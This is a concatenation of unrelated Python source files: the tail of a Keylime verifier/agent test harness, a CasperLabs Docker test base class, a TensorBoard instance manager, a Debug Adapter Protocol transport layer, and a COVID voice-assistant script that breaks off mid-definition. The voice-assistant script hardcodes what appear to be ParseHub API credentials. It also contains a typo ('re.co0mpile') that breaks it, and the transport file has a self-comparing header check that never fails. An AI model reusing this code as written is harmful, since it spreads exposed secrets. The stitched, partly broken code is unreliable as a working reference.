self.fail("Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if port is None or port != "8882":
self.fail("Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
self.fail("Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
# call the pre_function
pre_function = test_functions.get("pre_function")
if pre_function is not None:
pre_function_name = pre_function.get('name')
pre_function_args = pre_function.get('args')
function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args) #self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
verb = test_functions.get("http_request_verb")
query = test_functions.get("http_request_query","")
test_functions.get("http_request_header")
req_header = test_functions.get("http_request_header")
response = tornado_requests.request(verb, full_url,
params=query,
data=thedata,
headers=req_header)
temp = tempfile.TemporaryFile()
for chunk in response.iter_content(1024):
temp.write(chunk)
temp.seek(0)
# copy the results for future checking
test_functions["http_result_status_actual"] = response.status_code
test_functions["http_result_header_actual"] = response.headers
test_functions["http_result_body_actual"] = temp.read()
#validate response status
if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
#validate response headers
if test_functions.get("http_result_header_expected") is not None and not (all(item in list(response.headers.items()) for item in list(test_functions["http_result_header_expected"].items()))):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
#validate (shallow) response body
if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
#validate (deep) response body
check_function = test_functions.get("check_function")
if check_function is not None:
check_argument = check_function.get("argument")
if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
# call the post_function
post_function = test_functions.get("post_function")
if post_function is not None:
post_function_name = post_function.get('name')
post_function_args = post_function.get('args')
function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
except Exception as e:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif isinstance(argument, file):
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
readKUV()
#modify the persistence file per the passed argument
if argument is not None:
string_to_write = self.modify_persistence_file(argument)
global cv_process
cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
time.sleep(1)
return True
def overwrite_config_file(self, path, section, option, value):
parser = configparser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# Writing our configuration file to 'example.ini'
with open(path, 'wb') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', str(cloudagent_start_port))
port_string_length = len(str(cloudagent_start_port))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(cloudagent_start_port)
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_start_port = cloudagent_start_port + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_port = int(cloudagent_port_read_from_file) + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
print("done creating cloud agents, waiting for them to start...")
time.sleep(10)
print("starting test...")
def kill_cloudagents_after_delay(self, argument):
sleep_time = argument.get('sleep')
time.sleep(sleep_time)
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
shutil.rmtree(new_dir)
cloudagent_port = cloudagent_start_port + 1
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
params = {
'agent_id': contrived_uuid,
}
try:
print(("Sending #" + str(cn) + " DELETE request to CV for uuid: " + contrived_uuid))
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + contrived_uuid + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + contrived_uuid + " failed with exception: %s"%e)
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
shutil.rmtree(new_dir)
for the_pid in cn_process_list:
print(("killing pid" + str(the_pid)))
os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
cv_process.kill()
return True
def launch_cloudagent(self, argument):
readKUV()
global cn_process
cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
time.sleep(1)
return True
def kill_cloudagent(self, argument):
cn_process.kill()
return True
def launch_required_servers(self, argument):
self.launch_cloudagent(argument)
self.launch_cloudverifier(argument)
return True
def kill_required_servers(self, argument):
self.kill_cloudagent(argument)
self.kill_cloudverifier(argument)
return True
def new_thread(self, args):
#create a new uuid, and place it in the queue
the_global_queue = args[0]
new_uuid = str(uuid.uuid4())
the_global_queue.put(new_uuid)
return threading.Thread(target=self.request_task,args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
# look up the test record
test_record = self.test_table.get(self._testMethodName)
#perform each of the test functions and store the results
change_or_validation = test_record.get(setup_or_state_change_or_validation)
if change_or_validation is not None:
for test_functions in test_record[setup_or_state_change_or_validation]:
# full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
# http_request_body_tag = test_functions.get("http_request_body")
# http_request_body_file_tag = test_functions.get("http_request_body_file")
# if http_request_body_tag != None and http_request_body_file_tag != None :
# self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
#
# thedata = ''
# if http_request_body_tag == None and http_request_body_file_tag != None:
# thedata = open(http_request_body_file_tag).read()
# else:
# thedata=http_request_body_tag
# verb = test_functions.get("http_request_verb")
# query = test_functions.get("http_request_query","")
# test_functions.get("http_request_header")
# req_header = test_functions.get("http_request_header")
concurrent_instances = None
concurrent_new_thread_function = None
concurrency_dict = test_functions.get("concurrency")
if concurrency_dict is not None:
concurrent_instances = concurrency_dict.get("instances")
concurrent_new_thread_function = concurrency_dict.get("new_thread_function")
if concurrent_instances is None or concurrent_new_thread_function is None:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers' )
for test_iteration in range(int(test_functions.get("test_iterations","1"))):
if concurrent_instances is None:
# do it inline on this thread
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration)
else:
threads = []
for count in range(concurrent_instances):
args = (queue, setup_or_state_change_or_validation, test_functions, test_iteration)
# call the new_thread_function specified in the test table under concurrency tag.
# the new_thread_function is responsible for setting up the task, and creating the new thread.
# the task given to the thread must not block and call task_done() on completion regardless of success or failure
new_thread = getattr(self, concurrent_new_thread_function)(args)
threads.append(new_thread)
#start the threads
for t in threads:
t.start()
# blocks until all tasks have called task_done()
queue.join()
#blocks until all threads are complete
for t in threads:
t.join()
def execute_test_definition(self):
test_record = self.test_table.get(self._testMethodName)
prerun_function_dict = test_record.get("prerun_function")
if prerun_function_dict is not None:
prerun_function_name = prerun_function_dict.get("name")
prerun_function_args = prerun_function_dict.get("args")
function_return = getattr(self, prerun_function_name)(prerun_function_args)
self.execute_test_function_set("setup_functions")
self.execute_test_function_set("state_change_functions")
self.execute_test_function_set("state_validation_functions")
postrun_function_dict = test_record.get("postrun_function")
if postrun_function_dict is not None:
postrun_function_name = postrun_function_dict.get("name")
postrun_function_args = postrun_function_dict.get("args")
function_return = getattr(self, postrun_function_name)(postrun_function_args)
def setUp(self):
pass
def tearDown(self):
#os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
docker_base.py
|
import json
import logging
import os
import threading
from multiprocessing import Process, Queue
from queue import Empty
from typing import Tuple, Union
from docker import DockerClient
from docker.models.containers import Container
from test.cl_node.errors import CommandTimeoutError, NonZeroExitCodeError
from test.cl_node.docker_config import DockerConfig
def humanify(line):
"""
Decode json dump of execution engine's structured log and render a human friendly line,
containing, together with prefix rendered by the Python test framework, all useful
information. The original dictionary in the EE structured log looks like follows:
{'timestamp': '2019-06-08T17:51:35.308Z', 'process_id': 1, 'process_name': 'casperlabs-engine-grpc-server', 'host_name': 'execution-engine-0-mlgtn', 'log_level': 'Info', 'priority': 5, 'message_type': 'ee-structured', 'message_type_version': '1.0.0', 'message_id': '14039567985248808663', 'description': 'starting Execution Engine Server', 'properties': {'message': 'starting Execution Engine Server', 'message_template': '{message}'}}
"""
if "execution-engine-" not in line:
return line
try:
_, payload = line.split("payload=")
except Exception:
return line
d = json.loads(payload)
return " ".join(str(d[k]) for k in ("log_level", "description"))
class LoggingThread(threading.Thread):
def __init__(
self,
terminate_thread_event: threading.Event,
container: Container,
logger: logging.Logger,
) -> None:
super().__init__()
self.terminate_thread_event = terminate_thread_event
self.container = container
self.logger = logger
def run(self) -> None:
containers_log_lines_generator = self.container.logs(stream=True, follow=True)
try:
while True:
if self.terminate_thread_event.is_set():
break
line = next(containers_log_lines_generator)
s = line.decode("utf-8").rstrip()
self.logger.info(f" {self.container.name}: {humanify(s)}")
except StopIteration:
pass
class DockerBase:
"""
This holds the common base functionality for docker images.
Rather than constants, we build up properties based on values. Some only work in subclasses.
"""
DOCKER_BASE_NAME = "casperlabs"
def __init__(self, config: DockerConfig) -> None:
self.config = config
self.connected_networks = []
self.docker_tag: str = "test"
if self.is_in_docker:
self.docker_tag = os.environ.get("TAG_NAME")
self.container = self._get_container()
@property
def is_in_docker(self) -> bool:
return os.environ.get("TAG_NAME") is not None
@property
def image_name(self) -> str:
return f"{self.DOCKER_BASE_NAME}/{self.container_type}:{self.docker_tag}"
@property
def name(self) -> str:
# TODO: For compatibility only with old methods. Once name -> container_name in old methods, remove.
return self.container_name
@property
def container_name(self) -> str:
return f"{self.container_type}-{self.config.number}-{self.config.rand_str}-{self.docker_tag}"
@property
def container_type(self) -> str:
# Raising exception rather than abstract method eliminates requiring an __init__ in child classes.
raise NotImplementedError("No implementation of container_type")
@property
def host_mount_dir(self) -> str:
return f"/tmp/resources_{self.docker_tag}_{self.config.number}_{self.config.rand_str}"
@property
def bonds_file(self) -> str:
return f"{self.host_mount_dir}/bonds.txt"
@property
def host_genesis_dir(self) -> str:
return f"{self.host_mount_dir}/genesis"
@property
def host_bootstrap_dir(self) -> str:
return f"{self.host_mount_dir}/bootstrap_certificate"
@property
def host_accounts_dir(self) -> str:
return f"{self.host_mount_dir}/accounts"
@property
def docker_client(self) -> DockerClient:
return self.config.docker_client
def _get_container(self):
# Raising exception rather than abstract method eliminates requiring an __init__ in child classes.
raise NotImplementedError("No implementation of _get_container")
def stop(self):
self.container.stop()
def start(self):
self.container.start()
def __repr__(self):
return f"<{self.__class__.__name__} {self.container_name}"
def exec_run(
self, cmd: Union[Tuple[str, ...], str], stderr=True
) -> Tuple[int, str]:
queue: Queue = Queue(1)
def execution():
r = self.container.exec_run(cmd, stderr=stderr)
queue.put((r.exit_code, r.output.decode("utf-8")))
process = Process(target=execution)
logging.info("COMMAND {} {}".format(self.container_name, cmd))
process.start()
try:
exit_code, output = queue.get(True, None)
if exit_code != 0:
logging.warning(
"EXITED {} {} {}".format(self.container.name, cmd, exit_code)
)
logging.debug("OUTPUT {}".format(repr(output)))
return exit_code, output
except Empty:
process.terminate()
process.join()
raise CommandTimeoutError(cmd, self.config.command_timeout)
def shell_out(self, *cmd: str, stderr=True) -> str:
exit_code, output = self.exec_run(cmd, stderr=stderr)
if exit_code != 0:
raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output)
return output
def network_from_name(self, network_name: str):
nets = self.docker_client.networks.list(names=[network_name])
if nets:
network = nets[0]
return network
raise Exception(f"Docker network '{network_name}' not found.")
def connect_to_network(self, network_name: str) -> None:
self.connected_networks.append(network_name)
network = self.network_from_name(network_name)
network.connect(self.container)
def disconnect_from_network(self, network_name: str) -> None:
try:
self.connected_networks.remove(network_name)
network = self.network_from_name(network_name)
network.disconnect(self.container)
except Exception as e:
logging.error(
f"Error disconnecting {self.container_name} from {network_name}: {e}"
)
def cleanup(self) -> None:
if self.container:
for network_name in self.connected_networks:
self.disconnect_from_network(network_name)
try:
self.container.remove(force=True, v=True)
except Exception as e:
logging.warning(f"Error removing container {self.container_name}: {e}")
class LoggingDockerBase(DockerBase):
"""
This adds logging to DockerBase
"""
def __init__(self, config: DockerConfig) -> None:
super().__init__(config)
self.terminate_background_logging_event = threading.Event()
self._start_logging_thread()
self._truncatedLength = 0
def _start_logging_thread(self):
self.background_logging = LoggingThread(
container=self.container,
logger=logging.getLogger("peers"),
terminate_thread_event=self.terminate_background_logging_event,
)
self.background_logging.start()
def start(self):
super().start()
if not self.background_logging.is_alive():
self._start_logging_thread()
@property
def container_type(self) -> str:
return super().container_type
def _get_container(self):
return super()._get_container()
def logs(self) -> str:
return self.container.logs().decode("utf-8")[self._truncatedLength :]
def truncate_logs(self):
self._truncatedLength = len(self.container.logs().decode("utf-8"))
def cleanup(self):
super().cleanup()
# Terminate the logging after cleaning up containers.
# Otherwise the thread may be locked waiting for another log line, rather than get
# the StopIteration exception when the container shuts down.
self.terminate_background_logging_event.set()
self.background_logging.join()
|
tensorboard_manager.py
|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
# Tensorboard 0.4.x above series
from tensorboard import default
if hasattr(default, 'PLUGIN_LOADERS'):
# Tensorflow 1.10 series
logging.debug("Tensorboard 1.10 or above series detected")
from tensorboard import program
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
argv = [
"--logdir", logdir,
"--reload_interval", str(reload_interval),
"--purge_orphaned_data", str(purge_orphaned_data),
]
tensorboard = program.TensorBoard(
default.PLUGIN_LOADERS,
default.get_assets_zip_provider())
tensorboard.configure(argv)
return application.standard_tensorboard_wsgi(
tensorboard.flags,
tensorboard.plugin_loaders,
tensorboard.assets_zip_provider)
else:
logging.debug("Tensorboard 0.4.x series detected")
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
plugins=default.get_plugins())
except ImportError:
# Tensorboard 0.3.x series
from tensorboard.plugins.audio import audio_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.distribution import distributions_plugin
from tensorboard.plugins.graph import graphs_plugin
from tensorboard.plugins.histogram import histograms_plugin
from tensorboard.plugins.image import images_plugin
from tensorboard.plugins.profile import profile_plugin
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.text import text_plugin
logging.debug("Tensorboard 0.3.x series detected")
_plugins = [
core_plugin.CorePlugin,
scalars_plugin.ScalarsPlugin,
images_plugin.ImagesPlugin,
audio_plugin.AudioPlugin,
graphs_plugin.GraphsPlugin,
distributions_plugin.DistributionsPlugin,
histograms_plugin.HistogramsPlugin,
projector_plugin.ProjectorPlugin,
text_plugin.TextPlugin,
profile_plugin.ProfilePlugin,
]
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
plugins=_plugins)
from .handlers import notebook_dir # noqa
TensorBoardInstance = namedtuple(
'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
def _ReloadForever():
current_thread = threading.currentThread()
while not current_thread.stop:
application.reload_multiplexer(multiplexer, path_to_run)
current_thread.reload_time = time.time()
time.sleep(reload_interval)
thread = threading.Thread(target=_ReloadForever)
thread.reload_time = None
thread.stop = False
thread.daemon = True
thread.start()
return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
reload_interval, path_prefix=""):
path_to_run = application.parse_event_files_spec(logdir)
if reload_interval:
thread = start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval)
else:
application.reload_multiplexer(multiplexer, path_to_run)
thread = None
tb_app = application.TensorBoardWSGI(plugins)
manager.add_instance(logdir, tb_app, thread)
return tb_app
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
def __init__(self):
self._logdir_dict = {}
def _next_available_name(self):
for n in itertools.count(start=1):
name = "%d" % n
if name not in self:
return name
def new_instance(self, logdir, reload_interval):
if not os.path.isabs(logdir) and notebook_dir:
logdir = os.path.join(notebook_dir, logdir)
if logdir not in self._logdir_dict:
purge_orphaned_data = True
reload_interval = reload_interval or 30
create_tb_app(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data)
return self._logdir_dict[logdir]
def add_instance(self, logdir, tb_application, thread):
name = self._next_available_name()
instance = TensorBoardInstance(name, logdir, tb_application, thread)
self[name] = instance
self._logdir_dict[logdir] = instance
def terminate(self, name, force=True):
if name in self:
instance = self[name]
if instance.thread is not None:
instance.thread.stop = True
del self[name], self._logdir_dict[instance.logdir]
else:
raise Exception("There's no tensorboard instance named %s" % name)
manager = TensorboardManger()
|
transport.py
|
'''
implements the client side of the Debug Adapter protocol
documentation can be found here
https://microsoft.github.io/debug-adapter-protocol/specification
https://microsoft.github.io/debug-adapter-protocol/overview
a list of server implementers can be found here
https://microsoft.github.io/debug-adapter-protocol/implementors/adapters/
'''
from __future__ import annotations
from ..typecheck import *
from ..import core
from .error import Error
import threading
class Transport(Protocol):
def write(self, message: bytes):
...
def readline(self) -> bytes:
...
def read(self, n: int) -> bytes:
...
def dispose(self):
...
class TransportProtocolListener (Protocol):
def on_event(self, event: str, body: dict[str, Any]):
...
async def on_reverse_request(self, command: str, arguments: dict[str, Any]) -> dict[str, Any]:
...
def on_transport_closed(self): ...
class TransportProtocol:
def __init__(
self,
transport: Transport,
events: TransportProtocolListener,
transport_log: core.Logger,
) -> None:
self.events = events
self.transport_log = transport_log
self.transport = transport
self.pending_requests: dict[int, core.Future[dict[str, Any]]] = {}
self.seq = 0
self.transport_log.log('transport', f'⟸ process/started ::')
self.thread = threading.Thread(target=self.read)
self.thread.start()
# Content-Length: 119\r\n
# \r\n
# {
# "seq": 153,
# "type": "request",
# "command": "next",
# "arguments": {
# "threadId": 3
# }
# }
def read(self):
header = b'Content-Length: '
header_length = len(header)
try:
while True:
# handle Content-Length: 119\r\n
line = self.transport.readline()
if not header.startswith(header):
core.error('Expecting Content-Length: header but did not...')
continue
size = int(line[header_length:].strip())
#handle \r\n
line = self.transport.readline()
if line != b'\r\n':
core.error('Expected \\n\\r but did not find...')
core.error(line)
continue
# read message
content = b''
while len(content) != size:
bytes_left = size - len(content)
content += self.transport.read(bytes_left)
core.call_soon_threadsafe(self.recieved_msg, core.json_decode(content))
except Exception as e:
core.call_soon_threadsafe(self.transport_log.log,'transport', f'⟸ process/stopped :: {e}')
core.call_soon_threadsafe(self.events.on_transport_closed)
def send(self, message: dict[str, Any]):
content = core.json_encode(message)
self.transport.write(bytes(f'Content-Length: {len(content)}\r\n\r\n{content}', 'utf-8'))
def dispose(self) -> None:
self.transport.dispose()
def transport_message(self, message: dict[str, Any]) -> None:
self.recieved_msg(message)
def send_request_asyc(self, command: str, args: dict[str, Any]|None) -> Awaitable[dict[str, Any]]:
future: core.Future[Dict[str, Any]] = core.Future()
self.seq += 1
request = {
'seq': self.seq,
'type': 'request',
'command': command,
'arguments': args
}
self.pending_requests[self.seq] = future
self.log_transport(True, request)
self.send(request)
return future
def send_response(self, request: dict[str, Any], body: dict[str, Any], error: str|None = None) -> None:
self.seq += 1
if error:
success = False
else:
success = True
data = {
'type': 'response',
'seq': self.seq,
'request_seq': request['seq'],
'command': request['command'],
'body': body,
'success': success,
'message': error,
}
self.log_transport(True, data)
self.send(data)
def log_transport(self, out: bool, data: dict[str, Any]):
type = data.get('type')
def sigil(success: bool):
if success:
if out:
return '⟸'
else:
return '⟹'
else:
if out:
return '⟽'
else:
return '⟾'
if type == 'response':
id = data.get('request_seq')
command = data.get('command')
body = data.get('body', data.get('message'))
self.transport_log.log('transport', f'{sigil(data.get("success", False))} response/{command}({id}) :: {body}')
return
if type == 'request':
id = data.get('seq')
command = data.get('command')
body = data.get('arguments')
self.transport_log.log('transport', f'{sigil(True)} request/{command}({id}) :: {body}')
return
if type == 'event':
command = data.get('event')
body = data.get('body')
self.transport_log.log('transport', f'{sigil(True)} event/{command} :: {body}')
return
self.transport_log.log('transport', f'{sigil(False)} {type}/unknown :: {data}')
@core.schedule
async def handle_reverse_request(self, request: dict[str, Any]):
command = request['command']
try:
response = await self.events.on_reverse_request(command, request.get('arguments', {}))
self.send_response(request, response)
except core.Error as e:
self.send_response(request, {}, error=str(e))
def recieved_msg(self, data: dict[str, Any]) -> None:
t = data['type']
self.log_transport(False, data)
if t == 'response':
try:
future = self.pending_requests.pop(data['request_seq'])
except KeyError:
# the python adapter seems to send multiple initialized responses?
core.info("ignoring request request_seq not found")
return
success = data['success']
if not success:
body: dict[str, Any] = data.get('body', {})
if error := body.get('error'):
future.set_exception(Error.from_message(error))
return
future.set_exception(Error(data.get('message', 'no error message')))
return
else:
body: dict[str, Any] = data.get('body', {})
future.set_result(body)
return
if t == 'request':
core.call_soon(self.handle_reverse_request, data)
if t == 'event':
event_body: dict[str, Any] = data.get('body', {})
event = data['event']
# use call_soon so that events and respones are handled in the same order as the server sent them
core.call_soon(self.events.on_event, event, event_body)
|
covid_voice_assistant.py
|
import requests
import json
import pyttsx3
import speech_recognition as sr
import re
import threading
import time
API_KEY = "tjouGqHAS-5X"
PROJECT_TOKEN = "t-Ub-trMaofD"
RUN_TOKEN = "t5zp4TEoB6zY"
class Data:
def __init__(self, api_key, project_token):
self.api_key = api_key
self.project_token = project_token
self.params = {
"api_key": self.api_key
}
self.data = self.get_data()
def get_data(self):
response = requests.get(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/last_ready_run/data', params=self.params)
data = json.loads(response.text)
return data
def get_total_cases(self):
data = self.data['total']
for content in data:
if content['name'] == "Coronavirus Cases:":
return content['value']
def get_total_deaths(self):
data = self.data['total']
for content in data:
if content['name'] == "Deaths:":
return content['value']
return "0"
def get_country_data(self, country):
data = self.data["country"]
for content in data:
if content['name'].lower() == country.lower():
return content
return "0"
def get_list_of_countries(self):
countries = []
for country in self.data['country']:
countries.append(country['name'].lower())
return countries
def update_data(self):
response = requests.post(f'https://www.parsehub.com/api/v2/projects/{self.project_token}/run', params=self.params)
def poll():
time.sleep(0.1)
old_data = self.data
while True:
new_data = self.get_data()
if new_data != old_data:
self.data = new_data
print("Data updated")
break
time.sleep(5)
t = threading.Thread(target=poll)
t.start()
def speak(text):
engine = pyttsx3.init()
engine.say(text)
engine.runAndWait()
def get_audio():
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source)
said = ""
try:
said = r.recognize_google(audio)
except Exception as e:
print("Exception ", str(e))
return said.lower()
def main():
speak("welcome bavadharini")
speak("session Started")
print("------------Session Started-------------")
data = Data(API_KEY, PROJECT_TOKEN)
END_PHRASE = "terminate"
country_list = data.get_list_of_countries()
TOTAL_PATTERNS = {
re.compile("[\w\s]+ total [\w\s]+ cases"):data.get_total_cases,
re.compile("[\w\s]+ total cases"): data.get_total_cases,
re.co0mpile("[\w\s]+ total [\w\s]+ deaths"): data.get_total_deaths,
re.compile("[\w\s]+ total deaths"): data.get_total_deaths
}
COUNTRY_PATTERNS = {
re.compile("[\w\s]+ cases [\w\s]+"): lambda country: data.get_country_data(country)['total_cases'],
